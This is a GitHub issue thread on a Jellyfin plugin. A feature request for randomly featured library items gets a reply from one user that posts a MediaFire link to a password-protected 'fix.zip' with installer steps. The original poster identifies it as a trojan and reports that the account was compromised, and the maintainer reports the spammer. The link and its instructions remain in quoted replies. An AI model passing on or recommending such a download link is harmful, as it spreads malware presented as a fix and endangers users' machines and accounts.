### ISSUE TITLE
ENHANCEMENT IDEA

### ISSUE THREAD

**Issue by nxllxvxxd** [lachlandcp/jellyfin-editors-choice-plugin#1]
Add the ability like in BobHasNoSoul's featured where you can just make it go through all the things in your library and randomly show them as apposed to just a users favorites

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

uhhhhhhhh what does this do it is just an exe I'm not really prone to trusting it lmao what do i even do with it

**Comment by nxllxvxxd** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

yeah just ran this through virus check and its a trojan try again dude

**Comment by lachlandcp** [comment]
Reported that user spreading malware and deleted comments containing the link.

Will have a look at that idea in OP, that'd be great.

**Comment by nxllxvxxd** [comment]
> Reported that user spreading malware and deleted comments containing the link.
> 
> Will have a look at that idea in OP, that'd be great.

yeah they literally got into my account and i have been spending the last 2 hours doing damage control so hopefully Github doesn't yeet me from existence, I've had this account since I was like 15 I DON'T wanna lose it
